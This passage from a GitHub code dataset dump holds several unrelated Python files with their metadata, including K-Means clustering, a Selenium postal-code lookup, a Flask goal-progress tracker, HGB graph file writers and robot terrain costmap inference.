math\r\nimport numpy as np\r\n\r\n# the hyperparameter for K-Means Algorithm\r\nk = 3\r\n\r\n# hardcoded problem data\r\ninst = np.array([\r\n [0.25, 0.50],\r\n [0.50, 0.35],\r\n [0.25, 0.50],\r\n [1.00, 0.35],\r\n [1.40, 0.70],\r\n [0.50, 0.85],\r\n [0.25, 1.00],\r\n [0.75, 1.00],\r\n [0.35, 1.25],\r\n [0.85, 1.25],\r\n [3.25, 0.50],\r\n [3.50, 0.35],\r\n [3.00, 1.00],\r\n [3.25, 0.85],\r\n [3.45, 0.85],\r\n [3.75, 0.85],\r\n [3.25, 1.10],\r\n [3.00, 3.25],\r\n [3.25, 3.00],\r\n [3.10, 3.50],\r\n [1.00, 2.50],\r\n [1.20, 2.40],\r\n [1.25, 2.50],\r\n [1.50, 2.50],\r\n [0.65, 2.75],\r\n [1.20, 2.75],\r\n [1.37, 2.75],\r\n [1.00, 3.00],\r\n [1.10, 3.20],\r\n [0.85, 3.35],\r\n])\r\n\r\n\r\ndef dist(p1, p2):\r\n return math.sqrt(pow(p1[0] - p2[0], 2) + pow(p1[1] - p2[1], 2))\r\n\r\n\r\ndef column(matrix, i):\r\n return [row[i] for row in matrix]\r\n\r\n\r\ndef getmincol(mat, col):\r\n poz = 0\r\n minim = np.inf\r\n for i in range(mat.shape[0]):\r\n if minim > mat[i][col]:\r\n minim = mat[i][col]\r\n poz = i\r\n return poz\r\n\r\n\r\n# the algorithm ------------------------------------------------------------------------------\r\n\r\n# the centroids are randomly generated, according to the given training instances\r\ncentr = np.random.randn(k, 2)\r\nnewcentr = np.zeros((k, 3))\r\n\r\n# the clusters are recomputed as each new iteration begins\r\nnewclus = [0] * inst.shape[0]\r\nD = np.zeros((k, inst.shape[0]))\r\nold_clus = [-1] * inst.shape[0]\r\nclus = newclus\r\nold_centr = np.random.randn(k, 2)\r\n\r\nwhile old_clus != clus and not np.array_equal(old_centr,centr):\r\n newcentr = np.zeros((k, 3))\r\n # computing distance matrix\r\n for i in range(k):\r\n for j in range(inst.shape[0]):\r\n D[i][j] = dist(inst[j], centr[i])\r\n\r\n # computing the clusters with Euclidean distance\r\n\r\n old_clus = clus.copy()\r\n for i in range(inst.shape[0]):\r\n clus[i] = getmincol(D, i)\r\n newcentr[clus[i]][2] += 1\r\n newcentr[clus[i]][0] += inst[i][0]\r\n newcentr[clus[i]][1] += inst[i][1]\r\n\r\n old_centr = centr.copy()\r\n # the centroid is relocated in the middle of the cluster\r\n for i in range(k):\r\n if newcentr[i][2] != 0:\r\n centr[i][0] = newcentr[i][0] / newcentr[i][2]\r\n centr[i][1] = newcentr[i][1] / newcentr[i][2]\r\n\r\n print(centr)\r\n print(clus)","repo_name":"CarolRameder/K-Means","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10217850726","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# strings to vectorize\nsample = np.array(['Apple computer of the apple mark',\n 'linux computer', 'windows computer'])\n\n# TfidfVectorizer\nvec_tfidf = TfidfVectorizer()\n\n# vectorize\nX = vec_tfidf.fit_transform(sample)\n\nprint('Vocabulary size: {}'.format(len(vec_tfidf.vocabulary_)))\nprint('Vocabulary content: {}'.format(vec_tfidf.vocabulary_))\n\n\n\n\ndef predict(self, body, body_plain=None):\n '''\n @param str body: pass pre-tokenized (wakati) text\n @return dict\n '''\n\n if body_plain:\n # apply business rules\n # for messages, apply them before tokenizing (i.e. on the plain body)\n bf = BizFilter()\n res_bf = bf.work(body_plain)\n\n if res_bf:\n return {\n 'predict': 1,\n 'score': app.config['SCORE_THRESHOLD_WORK_SPAM'] + 1.0,\n 'vocabulary': res_bf['keyword']\n }\n\n # TfidfVectorizer.transform only accepts an iterable, so pass the body as a list\n tfidf = app.config['vect'].transform([body])\n lsa_reduced = app.config['lsa'].transform(tfidf)\n predict = 
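The double loop filling D above is correct but costs O(k*n) Python-level iterations; NumPy broadcasting computes the whole distance matrix in one shot. A vectorized equivalent sketch, keeping the same (k, n) layout for D:

import numpy as np

inst = np.random.rand(30, 2)
centr = np.random.rand(3, 2)
D = np.linalg.norm(inst[None, :, :] - centr[:, None, :], axis=2)   # shape (3, 30)
clus = np.argmin(D, axis=0)                                        # nearest centroid per instance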
app.config['clf'].predict(lsa_reduced)\n\n score = self._get_score(app.config['clf'], lsa_reduced)\n\n vocabulary = self._get_vocabulary(app.config['vect'], tfidf)\n","repo_name":"0xb5951/shipment_title_generator","sub_path":"extract_title.py","file_name":"extract_title.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39807326112","text":"import pytest\nfrom sqlconstructor import SqlQuery, SqlSection\n\n\n@pytest.mark.SqlQuery\n@pytest.mark.SqlSection\ndef test_getitem_by_slice():\n a = SqlQuery()\n a['select'](\n 'id',\n 'name',\n )\n a['from']('product')\n a['where']('quantity > 0')\n assert len(a) == 3\n b = a[:-1]\n assert b is not a\n assert len(b) == 2\n iter_of_a = iter(a)\n iter_of_b = iter(b)\n for _ in range(2):\n assert next(iter_of_a) is next(iter_of_b)\n assert str(b()) == '\\n'.join(\n (\n 'SELECT',\n ' id,',\n ' name',\n 'FROM',\n ' product'\n )\n )\n","repo_name":"akvilary/sqlconstructor","sub_path":"tests/test_sql_query/test_getitem_by_slice.py","file_name":"test_getitem_by_slice.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36807790560","text":"import matplotlib.pyplot as plt\n\nclass PlotDataController():\n\n def get_lines(self):\n return []\n\n def add_data(self, labels, data, label, style):\n if style == \"lines\":\n self.ax.plot(labels, data, label=label)\n elif style == \"real\":\n self.ax.plot(labels, data, 'k-', label=label)\n elif style == \"dots\":\n self.ax.scatter(labels, data, label=label)\n elif style == \"bars\":\n self.ax.bar(labels, data, label=label)\n\n def prepare(self, ax):\n pass\n\n\n def adjust(self, fig, ax):\n adjust={}\n adjust['left'] = .08\n adjust['bottom'] = .1\n adjust['right'] = .996\n adjust['top'] = .988\n adjust['wspace'] = 0.16\n adjust['hspace'] = .178\n \n fig.tight_layout()\n \n plt.subplots_adjust(**adjust)\n\n def plot(self, x, y, style):\n fig, ax = plt.subplots()\n self.ax = ax\n\n self.prepare(x, y, style)\n\n if x == 'estimator':\n self.ax.set_xlabel('Estimator parameter')\n if x == 'samples':\n self.ax.set_ylabel('Samples')\n\n if y == 'result':\n self.ax.set_ylabel('Calculated entropy')\n if y == 'score':\n self.ax.set_ylabel('Score')\n\n ax.legend()\n self.adjust(fig, ax)\n\n plt.show()\n\n self.ax = None\n\n \n","repo_name":"eduardoHoefel/dear-tool","sub_path":"gui/objects/plot/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28512196338","text":"import unittest\n\nimport pandas as pd\n\n# Alexander imports\nfrom sys import path\nfrom os.path import dirname as dir\npath.append(dir(path[0]))\n\nimport preprocessing\n \nclass TestPreprocessing(unittest.TestCase):\n \n def setUp(self):\n pass\n\n def test_label_encoder(self):\n \"\"\"Test that LabelEncoder works as intended for a normal case.\"\"\"\n encoder = preprocessing.LabelEncoder()\n data = [{'Sex': 'Male'},{'Sex': 'Female'}]\n df = pd.DataFrame(data)\n new_df = encoder.fit_transform(df)\n expected_data = [{'Sex': 1},{'Sex': 0}]\n self.assertEqual(new_df.to_dict('records'), expected_data)\n \n def test_label_encoder_encodings(self):\n \"\"\"Test that attribute 'encodings' of LabelEncoder is correct.\"\"\"\n encoder = preprocessing.LabelEncoder()\n data = [{'Sex': 'Male'},{'Sex': 'Female'}]\n df = 
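In PlotDataController.adjust above, tight_layout() runs first and the later subplots_adjust(**adjust) overrides it, so the hard-coded margins are what actually take effect. A headless check of that ordering:

import matplotlib
matplotlib.use('Agg')                      # render off-screen
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
fig.tight_layout()
plt.subplots_adjust(left=0.08, right=0.996)
assert abs(fig.subplotpars.left - 0.08) < 1e-9   # the later call wins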
pd.DataFrame(data)\n new_df = encoder.fit(df)\n sorted_a = sorted(encoder.encodings['Sex'])\n sorted_b = sorted(['Male', 'Female'])\n self.assertEqual(sorted_a, sorted_b)\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"alessandrosp/alexander","sub_path":"alexander/tests/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27616873005","text":"\nimport time\nfrom UTL.classes import shot_types, event_types\nfrom ProcessingSteps.Processing_Steps import (STEP_1_shots_processing, STEP_2_resolving_double_logos, STEP_3_audio_processing, STEP_4_processing_output_shots,\nSTEP_5_classifying_shot_sequence, STEP_6_processing_final_output, STEP_7_file_output, STEP_8_rendering_video)\nimport cv2\n\n\ndef main():\n # CONSTANTS _________________________________________________________\n video_name = \"shf_united_vs_burnley_2\"\n VIDEO_PATH = \"shf_united_vs_burnley_2.mp4\"\n cap = cv2.VideoCapture(VIDEO_PATH)\n if cap.isOpened() == False:\n print('err reading video')\n return\n\n SHOT_TYPES = shot_types()\n EVENT_TYPES = event_types()\n\n t1 = time.time()\n\n # shots processing _____________________________________________________\n shots = STEP_1_shots_processing(cap, SHOT_TYPES)\n\n # resolving double logos _____________________________________________\n STEP_2_resolving_double_logos(shots, SHOT_TYPES)\n\n # audio processing _________________________________________________\n # Detecing if shot contains high volume ____________________________\n STEP_3_audio_processing(shots, VIDEO_PATH)\n\n # processing output shots __________________________________________________\n # main shots depending on replay and other shots depending on high volume\n output_video_shots_1, output_video_shots_2 = STEP_4_processing_output_shots(\n shots, SHOT_TYPES)\n\n # classifying shots Sequence _____________________________________________\n shots_classes = STEP_5_classifying_shot_sequence(\n output_video_shots_1, output_video_shots_2, SHOT_TYPES, EVENT_TYPES)\n # Final output ______________________________________________________________\n output_video_shots, final_video = STEP_6_processing_final_output(\n output_video_shots_1, output_video_shots_2, shots_classes, SHOT_TYPES)\n\n t2 = time.time()\n\n # write outputs to file ________________________________________________\n STEP_7_file_output(shots_classes, EVENT_TYPES, video_name,\n shots, output_video_shots, output_video_shots_2, t1, t2)\n\n # rendering video _______________________________________________________\n STEP_8_rendering_video(final_video,VIDEO_PATH, video_name)\n\n\nmain()\n","repo_name":"demhahmed/GP-video-summary","sub_path":"code/MAIN_STEPS.py","file_name":"MAIN_STEPS.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34573592297","text":"from selenium import webdriver as seleniumOptions\nfrom selenium.webdriver.common.by import By\nimport pyautogui as timeResponse\n\n# get browser that will use.\nbrowser = seleniumOptions.Chrome()\n\n# open url to get the data\nbrowser.get('https://buscacepinter.correios.com.br/app/endereco/index.php')\n\n# wait computer response.\ntimeResponse.sleep(2)\n\n# find element name to write CPF.\nbrowser.find_element(By.NAME, 'endereco').send_keys('06764040')\n\n# wait computer response.\ntimeResponse.sleep(2)\n\n# press button 
\"find\".\nbrowser.find_element(By.NAME, 'btn_pesquisar').click()\n\n# wait computer response.\ntimeResponse.sleep(4)\n\n# find xpath from table.\nelementTable = browser.find_element(By.XPATH, '//*[@id=\"resultado-DNEC\"]')\n\nfor tableRow in elementTable.find_elements(By.TAG_NAME, 'tr'):\n address = ''\n for columnTable in tableRow.find_elements(By.TAG_NAME, 'td'):\n address = address + '\\n' + columnTable.text\n\nprint(address)\n","repo_name":"NataliNascimento/PythonAutomation","sub_path":"ExtractCep2.py","file_name":"ExtractCep2.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24598074305","text":"# Module with classes and functions for outputting of graph data sets in the HBG format.\n# See https://www.biendata.xyz/hgb/#/about\n\nimport os\nimport pandas\nimport modules.node as node\n\n\norder_types_by = 'config' # Choose config or node\n\n# Write out an info.dat file at the specified path\n# Per https://www.biendata.xyz/hgb/#/about:\n# info.dat: The information of node labels. Each line has (node_id, node_type_id, node_label).\n# For multi-label setting, node_labels are split by comma.\ndef write_info_dat(path, config, node_list):\n file_name = os.path.join(path, 'info.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['TYPE', 'NAME', 'LABELS']), file=f)\n if order_types_by == 'node':\n for key, item in node.List.type_map(node_list).items():\n print(item['id'], \"\\t\", key, ','.join(item['labels']), file=f)\n else:\n id = 0\n label_dict = node.TypeInfo(config).label_dict()\n for key in label_dict:\n print(id, \"\\t\", key, ','.join(label_dict[key]), file=f)\n id = id + 1\n f.close()\n\n\n# Write out a node.dat file at the specified path using data from the specified array index\n# Per https://www.biendata.xyz/hgb/#/about:\n# node.dat:The information of nodes. Each line has (node_id, node_name, node_type_id, node_feature).\n# Node features are vectors split by comma.\ndef write_node_dat(path, node_list, index):\n type_map = node.List.type_map(node_list)\n file_name = os.path.join(path, 'node.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['NODE', 'NAME', 'TYPE', 'VALUES']), file=f)\n for item in node_list:\n print(item, \"\\t\", type_map[item.type_name]['id'], \"\\t\", ','.join(item.attribute_values(index)), file=f)\n f.close()\n\n\n# Write out a link.dat file at the specified path using data from the specified array index\n# Per https://www.biendata.xyz/hgb/#/about:\n# link.dat: The information of edges. 
Each line has (node_id_source, node_id_target, edge_type_id, edge_weight).\n# TODO implement node weighting\ndef write_link_dat(path, node_list, distance=1):\n file_name = os.path.join(path, 'link.dat')\n f = open(file_name, 'w')\n print(\"\\t\".join(['START', 'END', 'LINK_TYPE', 'LINK_WEIGHT']), file=f)\n for item in node_list:\n if (isinstance(item, node.SetPointNode)):\n for target in item.extended_links(distance):\n # Hard-code type and weight for now\n print(item.node_id, '\\t', target.node_id, '\\t', '0\\t1', file=f)\n f.close()\n\n\n# Write out a meta.dat file at the specified path\n# The file contains summary data such as the number of each type of node\ndef write_meta_dat(path, config, node_list):\n type_map = node.List.type_map(node_list)\n file_name = os.path.join(path, 'meta.dat')\n f = open(file_name, 'w')\n print('Total Nodes:', \"\\t\", len(node_list), file=f)\n if order_types_by == 'node':\n for type_name, data in type_map.items():\n print(f\"Node_Type_{data['id']}:\", \"\\t\", data['count'], file=f)\n else:\n id = 0\n label_dict = node.TypeInfo(config).label_dict()\n for key in label_dict:\n if key in type_map:\n data = type_map[key]\n else:\n data = {'count' : 0}\n print(f\"Node_Type_{id}:\", \"\\t\", data['count'], file=f)\n id = id + 1\n f.close()\n\n\n# Return a path tree of Base/Year/Month/Day/Hour using the correct path separator for the current OS\n# If requested, the path can also include minutes and seconds subdirectories.\ndef path_from_date(base_path, target_date, minutes=False, seconds=False):\n date = pandas.to_datetime(target_date)\n path = os.path.join(base_path, date.strftime(\"%Y\"), date.strftime(\"%m\"), date.strftime(\"%d\"), date.strftime(\"%H\"))\n if minutes or seconds:\n path = os.path.join(path, date.strftime(\"%M\"))\n if seconds:\n path = os.path.join(path, date.strftime(\"%S\"))\n return path\n\n\ndef dir_from_date(base_path, target_date):\n date = pandas.to_datetime(target_date)\n dir = date.strftime(\"%Y\") + date.strftime(\"%m\") + date.strftime(\"%d\") + \\\n '_' + date.strftime(\"%H\") + date.strftime(\"%M\") + date.strftime(\"%S\")\n path = os.path.join(base_path, dir)\n return path\n\n\n\n\n\n","repo_name":"JeffersonLab/ced2graph","sub_path":"modules/hgb.py","file_name":"hgb.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28707571036","text":"from flask import (\n Blueprint,\n current_app,\n g,\n redirect,\n render_template,\n request,\n url_for,\n)\n\nfrom flask_table import create_table, Table, Col\n\nfrom lifetracker.auth import login_required\nfrom lifetracker.db import get_db\nfrom lifetracker.goals import fetch_goals\n\nbp = Blueprint(\"progress\", __name__)\n\n\nclass ProgressTable(Table):\n name = Col(\"Goal\")\n description = Col(\"Description\")\n\n\ndef get_recent_progress_by_goal(goal_id, dates, offset=0, check_author=True):\n \"\"\"\n Get recent progress for a goal over a set number of dates.\n\n : param limit: number of dates to return\n : param offset: page to display (paginiation)\n : return: a table with columns as dates and goals as rows\n \"\"\"\n sql_query = (\n \"SELECT p.id AS progress_id, hours, goal_id, date(p.created) AS \"\n + \" date, g.title\"\n + \" FROM progress p JOIN user u ON p.author_id = u.id\"\n + \" JOIN goals g ON p.goal_id = g.id\"\n + \" WHERE u.id = ? AND p.goal_id = ? 
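The date-to-path helpers above just chain strftime components through os.path.join. A small check of the expected output shape (the base path is arbitrary):

import os
import pandas

date = pandas.to_datetime('2021-03-05 07:09:11')
parts = [date.strftime(fmt) for fmt in ('%Y', '%m', '%d', '%H')]
assert os.path.join('base', *parts) == os.path.join('base', '2021', '03', '05', '07')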
AND date IN (%s)\"\n % \",\".join(\"?\" * len(dates))\n )\n arguments = (g.user[\"id\"], goal_id) + tuple(dates)\n progress = get_db().execute(sql_query, arguments).fetchall()\n if progress is None:\n return None\n else:\n return progress\n\n\ndef fetch_progress_dates(limit, offset=0, check_author=True):\n \"\"\"\n Get the recent dates during which progress has been written.\n\n :param limit: number of results to return\n :param offset: which page of results to display\n :return: the past progress dates as a list\n\n \"\"\"\n progress_dates = (\n get_db()\n .execute(\n \"SELECT DISTINCT DATE(created) as date, author_id\"\n \" FROM progress p JOIN user u ON p.author_id = u.id\"\n \" WHERE u.id = ?\"\n \" ORDER BY date DESC\"\n \" LIMIT ?\",\n (g.user[\"id\"], limit),\n )\n .fetchall()\n )\n return [row[\"date\"] for row in progress_dates]\n\n\ndef progress_table():\n \"\"\"\n Assemble progress table fetching goals, then progress results by id.\n The assembled table is then returned.\n \"\"\"\n output = []\n limit = 5\n goals = fetch_goals()\n progress_dates = fetch_progress_dates(limit)\n TableCls = create_table(\"Progress\").add_column(\"Goal\", Col(\"Goal\"))\n # create table columns\n for row in progress_dates:\n TableCls.add_column(row, Col(row))\n\n for row in goals:\n goal_progress = get_recent_progress_by_goal(row[\"id\"], progress_dates, 5)\n if goal_progress is not None:\n # collate progress into a dictionary\n output_dictionary = {\"Goal\": goal_progress[0][\"title\"]}\n for row in goal_progress:\n output_dictionary[row[\"date\"]] = row[\"hours\"]\n # add remaining keys not found\n for row in progress_dates:\n if row not in output_dictionary.keys():\n output_dictionary[row] = None\n # append to output list\n output.append(output_dictionary)\n # build table\n table = TableCls(output, no_items=\"-\")\n return table\n\n\n@bp.route(\"/progress\", methods=(\"GET\",))\n@login_required\ndef index():\n \"\"\"\n Display progress for the last five days.\n \"\"\"\n # create a row based table based on the goal description and each date's\n # progress value for each goal\n # this includes a row for the headers: Goal, Date1, Date2 etc\n table = progress_table()\n return render_template(\"progress/index.html\", table=table)\n\n\n@bp.route(\"/progress/create\", methods=(\"GET\", \"POST\"))\n@login_required\ndef create():\n \"\"\"\n Progress can be added to any/all goal(s) displayed.\n \"\"\"\n goals = fetch_goals()\n if request.method == \"POST\":\n data_id = request.form.getlist(\"id\")\n data_progress = request.form.getlist(\"progress\")\n data_quality = request.form.getlist(\"grade\")\n data = {\n int(k): [int(v), int(s)]\n for k, v, s in zip(data_id, data_progress, data_quality)\n }\n db = get_db()\n for goal, data_poihts in data.items():\n db.execute(\n \"INSERT INTO progress (author_id, goal_id, hours, quality) \"\n \" VALUES (?, ?, ?, ?)\",\n (g.user[\"id\"], goal, data_poihts[0], data_poihts[1]),\n )\n db.commit()\n return redirect(url_for(\"progress.index\"))\n\n return render_template(\"progress/create.html\", goals=goals)\n","repo_name":"robotjandal/lifetracker","sub_path":"lifetracker/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20908959765","text":"from collections import OrderedDict\nimport numpy as np\nimport os\nimport torch\nfrom torchvision import transforms as T\nimport torch.nn as nn\nimport torch.optim as optim\nfrom 
learned_cost_map.trainer.model import CostModel\nfrom learned_cost_map.terrain_utils.terrain_map_tartandrive import TerrainMap\nfrom learned_cost_map.trainer.utils import get_dataloaders, get_balanced_dataloaders, preprocess_data, avg_dict, get_FFM_freqs, FourierFeatureMapping\n\nfrom math import ceil\nimport matplotlib.pyplot as plt\nimport time\n\n\nbgr_to_rgb = lambda img: img[[2,1,0],:,:] \n \ntransform_to_img = T.Compose([\n T.Normalize(mean = [0., 0., 0.], std = [1/0.229, 1/0.224, 1/0.225]),\n T.Normalize(mean = [-0.485, -0.456, -0.406], std = [1., 1., 1.]),\n T.Lambda(bgr_to_rgb),\n T.ToPILImage(),\n np.asarray\n])\n\n\ndef tensor_to_img(img_tensor):\n '''Converts a tensor representing an image into a numpy array that can be directly used for plotting purposes.\n\n Args:\n img_tensor:\n Tensor(C,H,W)->Float or Tensor(H,W)->Float representing image\n Returns:\n img_plot:\n Array(H,W,C)->Uint8 or Array(H,W)->Uint8 image ready to be plotted\n '''\n if img_tensor.shape[0] == 1 or len(img_tensor.shape) < 3:\n raise NotImplementedError\n\n img_plot = transform_to_img(img_tensor)\n\n return img_plot\n\ndef tensor_to_heightmap(heightmap_tensor):\n '''Converts a heightmap tensor into an array that can be directly used for plotting purposes.\n\n Args:\n heightmap_tensor:\n Tensor(C,H,W)->Float representing heightmap, where C=5 and corresponds to the following channels: min height, max height, mean height, std height, invalid mask. These maps are in the [0,1] range,and were normalized using values min=-2, max=2, and x_norm = x-min/(max-min).\n Returns:\n heightmap_array:\n Array(H,W,C)->Float heightmap, where C=2, and in this case correspond to the unnormalized min and max values for the heightmap.\n '''\n\n unnorm_height_map = 4*heightmap_tensor[:-1,] - 2\n # import pdb;pdb.set_trace()\n # nan_idx = torch.nonzero(heightmap_tensor[-1] == 1)\n # for channel in range(unnorm_height_map.shape[0]):\n # unnorm_height_map[channel][nan_idx] = torch.nan\n heightmap_array = unnorm_height_map[0:2].permute(1,2,0).detach().cpu().numpy()\n\n return heightmap_array\n\n\ndef patches_to_imgs(patches_tensor):\n '''Converts a tensor of map patches into two numpy arrays: One that contains the batched RGB data for each patch into a form that can be directly plotted if iterated over, and one that contains the batched heightmap information.\n\n Args:\n patches_tensor:\n Tensor(N, C, H, W)->Float representing N map patches, where N corresponds to the lookahead.\n Returns:\n rgb_maps:\n Array(N, H, W, C)->Uint8 containing RGB map information for each patch, where C=3\n height_maps:\n Array(N, H, W, C)->Float containing height map information for each patch, where C=2. 
TBD whether the two channel dimensions correspond to min/max or mean/std.\n '''\n if len(patches_tensor.shape) < 4:\n raise NotImplementedError\n\n # import pdb;pdb.set_trace()\n rgb_maps_tensor = patches_tensor[:,0:3, :, :]\n height_maps_tensor = patches_tensor[:, 3:, :, :]\n\n # Process rgb maps\n rgb_imgs = []\n for img in rgb_maps_tensor:\n rgb_img = transform_to_img(img)\n rgb_imgs.append(rgb_img)\n rgb_maps = np.stack(rgb_imgs, axis=0)\n\n # Process height maps\n # Remember: need to unnormalize\n height_maps = []\n for hm in height_maps_tensor:\n height_map = tensor_to_heightmap(hm)\n height_maps.append(height_map)\n height_maps = np.stack(height_maps, axis=0)\n\n return rgb_maps, height_maps\n\ndef process_invalid_patches(patches, thresh=0.5):\n '''Takes in a tensor of patches and returns a tensor of ones and zeros, with ones signaling an invalid patch so that the cost can be set appropriately.\n\n Args:\n - patches:\n Tensor of shape [B, C, H, W]\n \n Returns: \n - invalid:\n Tensor of shape [B]\n '''\n invalid_channels = patches[:, -1, :, :]\n invalid_vals = torch.sum(invalid_channels, dim=(1,2))/(patches.shape[-2]*patches.shape[-1])\n invalid_flags = invalid_vals > thresh\n\n return invalid_flags\n\ndef produce_costmap(model, maps, map_metadata, crop_params, costmap_batch_size=256, costmap_stride=20, vel=None, fourier_freqs=None):\n '''Returns a costmap using a trained model from a maps dict.\n\n Args:\n - model:\n nn.Module object, Torch model used for cost inference.\n - maps: \n A dictionary of maps (as would go into TerrainMap) defined as follows:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n - map_metadata: \n Information about the map in metric space defined as follows: \n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n - crop_params:\n Dictionary containing information about the output crops \n {\n 'crop_size': [Float, Float] # size in meters of the patch to obtain below the robot,\n 'output_size': [Int, Int] # Size of output image in pixels\n }\n - vel:\n Float of unnormalized velocity at which we want to query the costmap. If name of the model is not CostVelModel or CostFourierVelModel, this should be None.\n - fourier_freqs:\n Tensor of fourier frequencies used in the CostFourierVelModel. 
If the name of the model is different, this should be None.\n \n Returns:\n - costmap:\n Tensor of dimensions as given by the map_metadata: (height/resolution, width/resolution) containing inferred costmap from learned model.\n '''\n\n print(f\"costmap_batch_size: {costmap_batch_size}, costmap_stride: {costmap_stride}\")\n # import pdb;pdb.set_trace()\n device = \"cuda\" # \"cuda\" if torch.cuda.is_available() else \"cpu\"\n tm = TerrainMap(maps=maps, map_metadata=map_metadata, device=device)\n\n\n # Get tensor of all map poses to be queried\n map_height = int(map_metadata['height']/map_metadata['resolution'])\n map_width = int(map_metadata['width']/map_metadata['resolution'])\n x_pixels = torch.arange(0, map_height, costmap_stride)\n y_pixels = torch.arange(0, map_width, costmap_stride)\n x_poses = x_pixels*map_metadata['resolution']+map_metadata[\"origin\"][0]\n y_poses = y_pixels*map_metadata['resolution']+map_metadata[\"origin\"][1]\n all_poses = torch.stack(torch.meshgrid(x_poses, y_poses, indexing=\"ij\"), dim=-1).view(-1, 2)\n # Append orientations\n all_poses = torch.cat([all_poses, torch.zeros(all_poses.shape[0], 1)], dim=-1).to(device).detach()\n\n num_cells = all_poses.shape[0]\n num_batches = ceil(num_cells/costmap_batch_size)\n batch_starts = [(k)*costmap_batch_size for k in range(num_batches)]\n batch_ends = [min(((k+1)*costmap_batch_size), num_cells) for k in range(num_batches)]\n\n all_costs = []\n # Query all map poses from TerrainMap\n # fig = plt.figure()\n # front_img_ax = fig.add_subplot(111)\n for b in range(num_batches):\n # if b % 100 == 0:\n # print(f\"Evaluating batch {b}/{num_batches}\")\n # import pdb;pdb.set_trace()\n patches = tm.get_crop_batch(poses=all_poses[batch_starts[b]:batch_ends[b]], crop_params=crop_params)\n # print(f\"Shape of patches: {patches.shape}\")\n invalid_flags = process_invalid_patches(patches, thresh=0.5)\n # rgb_maps, height_maps = patches_to_imgs(patches)\n # front_img_ax.clear() \n # front_img_ax.imshow(rgb_maps[0])\n # p = all_poses[batch_starts[b]:batch_ends[b]]\n # front_img_ax.set_title(f\"Element {b}. 
Looking at pose {p}\")\n # Pass all map patches to network\n # import pdb;pdb.set_trace()\n input_data = {}\n # import pdb;pdb.set_trace()\n input_data['patches'] = patches.cuda()\n if vel is not None:\n vels_vec = (torch.ones(patches.shape[0], 1) * vel/20.0).cuda()\n else:\n vels_vec = None\n if fourier_freqs is not None:\n fourier_freqs = fourier_freqs.cuda()\n fourier_vels = (FourierFeatureMapping(vels_vec, fourier_freqs)).cuda()\n else:\n fourier_vels = None\n input_data['vels'] = vels_vec\n input_data['fourier_vels'] = fourier_vels\n costs = model(input_data).detach()\n costs[invalid_flags] = 0.5 # TODO Uncomment this line if you want to set high costs to invalid areas\n # import pdb;pdb.set_trace()\n if len(costs.shape) > 1:\n costs = costs.squeeze()\n if len(costs.shape) < 1:\n costs = costs.view(-1)\n all_costs.append(costs)\n # plt.pause(0.1)\n \n all_costs = torch.cat(all_costs, 0)\n # Reshape cost predictions into costmap\n # import pdb;pdb.set_trace()\n reduced_costmap = all_costs.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n\n costmap = torch.nn.functional.interpolate(reduced_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n # costmap = reduced_costmap \n\n costmap = costmap.squeeze()\n \n # costmap = all_costs.view(map_height, map_width)\n costmap = costmap.cpu().numpy()\n\n return costmap\n\ndef produce_ensemble_costmap(model, maps, map_metadata, crop_params, costmap_batch_size=256, costmap_stride=20, vel=None, fourier_freqs=None):\n '''Returns a costmap using a trained model from a maps dict.\n\n Args:\n - model:\n nn.Module object, Torch model used for cost inference.\n - maps: \n A dictionary of maps (as would go into TerrainMap) defined as follows:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n - map_metadata: \n Information about the map in metric space defined as follows: \n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n - crop_params:\n Dictionary containing information about the output crops \n {\n 'crop_size': [Float, Float] # size in meters of the patch to obtain below the robot,\n 'output_size': [Int, Int] # Size of output image in pixels\n }\n - vel:\n Float of unnormalized velocity at which we want to query the costmap. If name of the model is not CostVelModel or CostFourierVelModel, this should be None.\n - fourier_freqs:\n Tensor of fourier frequencies used in the CostFourierVelModel. 
